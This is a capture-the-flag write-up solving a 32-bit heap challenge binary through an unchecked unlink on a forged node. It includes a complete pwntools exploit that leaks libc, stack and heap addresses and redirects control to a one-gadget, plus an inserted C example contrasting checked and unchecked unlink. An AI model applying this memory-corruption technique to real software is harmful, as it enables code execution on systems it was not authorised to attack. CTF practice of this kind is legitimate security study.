My fundamentals are too weak… tcl
Not sure which competition this challenge is from… After class a friend sent me the problem… It looked simple at first… Only after reading a senior's approach in the group chat did I solve it.. Taking the roundabout route, the roundabout route... Attachment
An x86 (32-bit) binary; the challenge's intent is clearly to test the exploitation approach…
➜ Desktop checksec hack
[*] '/home/n132/Desktop/hack'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
The program lets you leak a stack address, a heap address and the libc base directly; the final part tests the exploitation itself.
P1 = fake_node->pre;
P2 = fake_node->next;
P1->next = P2;
P2->pre = P1;
where fake_node is fully controllable.
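The two writes above are the classic unchecked unlink. As an added example that is not part of the original writeup, the following C shows that primitive beside the hardened form in the style of glibc's "corrupted double-linked list" check, which refuses a node whose neighbours do not point back at it. The node layout and the demo functions are hypothetical.

```c
#include <stddef.h>
/* Hypothetical node layout with the pre/next fields the writeup describes. */
struct node { struct node *pre; struct node *next; };

/* Unchecked unlink: both writes are driven by the node's own fields, so a forged node yields an arbitrary write. */
static void unlink_unchecked(struct node *n)
{
    struct node *p1 = n->pre, *p2 = n->next;
    p1->next = p2;
    p2->pre = p1;
}

/* Hardened unlink in the style of glibc's "corrupted double-linked list" check:
 * both neighbours must point back at n. Returns 0 on success, -1 when rejected. */
static int unlink_checked(struct node *n)
{
    struct node *p1 = n->pre, *p2 = n->next;
    if (p1->next != n || p2->pre != n)
        return -1;
    p1->next = p2;
    p2->pre = p1;
    return 0;
}

/* Genuine list a <-> b <-> c: removing b passes the check and leaves a <-> c. Returns 1 on that outcome. */
int demo_genuine(void)
{
    struct node a, b, c;
    a.pre = NULL; a.next = &b;
    b.pre = &a;   b.next = &c;
    c.pre = &b;   c.next = NULL;
    if (unlink_checked(&b) != 0)
        return 0;
    return a.next == &c && c.pre == &a;
}

/* Forged node (constructed) whose pre/next point at two unrelated objects: the check rejects it
 * and leaves both untouched, while the unchecked version writes into both. Returns 1 on that outcome. */
int demo_forged(void)
{
    struct node t1 = {NULL, NULL}, t2 = {NULL, NULL};
    struct node fake = {&t1, &t2};
    if (unlink_checked(&fake) != -1 || t1.next != NULL || t2.pre != NULL)
        return 0;
    unlink_unchecked(&fake);
    return t1.next == &t2 && t2.pre == &t1;
}
```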
8048702: c9 leave
8048703: 8d 61 fc lea -0x4(%ecx),%esp
8048706: c3 ret
EXP
from pwn import *
#context.log_level = 'debug'
p = process("./hack")
elf = ELF("./hack")
libc = ELF("/lib/i386-linux-gnu/libc.so.6")

# first read: 134520860 is 0x804a01c in decimal; the value read back is treated as the address of puts
p.recvuntil("input address: \n")
p.sendline("134520860")
p.recvuntil("0x")
addr = int(p.recvuntil("\n",drop=True),16)
print(hex(addr))
libc_base = addr - libc.symbols['puts']
environ_addr = libc_base+libc.symbols['_environ']

# second read: _environ in libc gives a stack pointer, from which the offsets below are taken
p.recvuntil("Second chance: \n")
p.sendline(str(environ_addr))
p.recvuntil("0x")
stack_addr = int(p.recvuntil("\n",drop=True),16)-(0xffffdef0-4-0xfffdd000)
ret_addr = stack_addr+0xffffd05c-0x804b000

# the program prints the node address, from which the heap base is derived
p.recvuntil("node is ")
heap=int(p.readuntil(",")[:-1],16)-0x20
log.info(hex(libc_base))
log.info(hex(stack_addr))
log.info(hex(heap))
#gdb.attach(p,'b *0x8048706')
libc.address=libc_base

# the controllable fake node: libc offset, stack and heap values as used in the original solve
payload = p32(0x3ac69+libc_base)+p32(0)+p32(0xffffd054-12+stack_addr-0xfffdc220)+p32(heap+0x24)
p.sendafter("now: ",payload)
p.interactive("nier>>>>")